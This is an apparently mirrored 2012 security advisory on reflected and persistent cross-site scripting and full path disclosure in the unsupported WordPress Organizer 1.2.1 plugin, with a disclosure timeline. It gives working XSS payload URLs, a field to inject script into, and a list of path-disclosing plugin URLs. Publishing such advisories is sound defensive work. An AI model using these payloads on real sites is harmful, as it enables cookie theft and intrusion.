WordPress Organizer 1.2.1 Cross Site Scripting / Path Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047605 漏洞类型
发布时间 2012-04-24 更新时间 2012-04-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040188
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello list!

I want to warn you about multiple security vulnerabilities in plugin 
Organizer for WordPress. This is the first in series of advisories 
concerning vulnerabilities in this plugin.

These are Cross-Site Scripting (reflected and persistent) and Full path 
disclosure vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are Organizer 1.2.1 and previous versions.

As answered me the developer of the plugin, he doesn't support it anymore 
and will no be fixing multiple vulnerabilities in it, about which I've 
informed him (these and many other vulnerabilities).

----------
Details:
----------

XSS (WASC-08):

http://site/wp-admin/admin.php?page=organizer/page/users.php&delete_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent) (WASC-08):

POST request at page 
http://site/wp-admin/admin.php?page=organizer/page/users.php
<script>alert(document.cookie)</script>
In field: "File extensions allowed".

Code will execute at the page users.php of the plugin.

Exploit:

http://websecurity.com.ua/uploads/2012/Organizer%20XSS-1.html

Full path disclosure (WASC-13):

http://site/wp-content/plugins/organizer/plugin_hook.php

http://site/wp-content/plugins/organizer/page/index.php

http://site/wp-content/plugins/organizer/page/dir.php

http://site/wp-content/plugins/organizer/page/options.php

http://site/wp-content/plugins/organizer/page/resize.php

http://site/wp-content/plugins/organizer/page/upload.php

http://site/wp-content/plugins/organizer/page/users.php

http://site/wp-content/plugins/organizer/page/view.php

------------
Timeline:
------------

2012.04.14 - announced at my site (http://websecurity.com.ua/5782/).
2012.04.15 - informed the developer.
2012.04.17 - the developer answered, that he didn't support the plugin 
anymore.
2012.04.21 - disclosed at my site.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua